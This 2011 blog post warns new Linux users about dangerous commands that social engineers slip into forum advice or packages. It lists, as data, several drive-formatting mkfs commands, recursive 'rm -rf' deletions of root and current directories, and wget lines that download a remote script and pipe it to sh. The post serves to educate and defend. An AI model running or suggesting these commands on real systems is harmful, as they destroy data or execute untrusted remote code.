Search Flipkart

Tuesday, September 13, 2011

Linux command threats

Here is the blog to warn you what you can loose executing these commands ..
Perhaps the most common reason people would use if they want to convert you to become a Linux user is the fact that Linux is far more secure than other operating systems. However I find it is really ridiculous when many Linux advocates proudly speak about how Linux is nigh immune to virus attacks, they rarely mention or are not aware of the negative and pernicious aspects of running such a powerful system. Most Linux users, especially the newbies, always have a false sense of perfect security when using Linux, which makes them very vulnerable to the evil people who use social engineering techniques to sabotage and exploit your Linux system. The most common methods to attack Linux systems are to trick the users to run dangerous commands or install strange packages which contain malicious commands. And since the command line is a very powerful tool, the dangerous commands are really more destructive than the average Windows viruses you may know.

Dangerous commands are very prevalent in facebook fanpages of Linux distros like the Ubuntu fanpage. With the popularity of Facebook nowadays, new users tend to come to facebook  fanpages to ask questions for their problems and look for new tips and tricks, and some evil guys would pretend to be friendly and provide a long list of commands in which they conceal one or two dangerous commands. The other places that I see a lot of packages that contains dangerous commands are sites from which you can download themes, icons and new packages like gnome-looks or other look sites.

Besides not to download any suspicious package from untrusted sources, the most effective way to protect your Linux system is to acknowledge yourself about the dangerous commands. Here are the most common commands that are very dangerous and you should never run this in your Linux system ( But if you really want to know how dangerous they are, you could try them in virtual machines).

1 - Commands that format your hard drive:

Do not run any command that contains mkfs, it will erase your your file or the whole hard drive to a blank filesytem. Examples of this kind of command would be:

sudo mkfs
sudo mkfs.ext3
sudo mkfs.bfs
sudo mkfs.cramfs
sudo mkfs.ext2
sudo mkfs.minix
sudo mkfs.msdos
sudo mkfs.reiserfs
sudo mkfs.vfat

2 - Commands that have "rm" :

The "rm" command means to remove, therefore it is advised to run this command with care, especially if it has the following tags:

rm -rf /
rm -rf .
rm -rf *
-f means force deletion (even if the file is write protected) and -r means to do it to all the subfolders. By the same token, rm -rf / means to delete everything in your root folder.

3 - The fork bomb

Although this command looks like a string of emotion icons on your chat windows, it will execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption, operating system damage, or other awful fate).

4 - Malicious code in Shell scripts

They are what you may get when you download a package from unreliable sources, the package usually contains a very long list of benign commands but in which a dangerous command may be carefully concealed. After your download and execute these packages, your system may become a bot for the hackers to use for their evil DDOS campaigns. Examples of these commands would be like:

wget http://some_place/some_file
sh ./some_file
wget http://some_place/some_file -O- | sh

Here is the link of original blog::::

1 comment: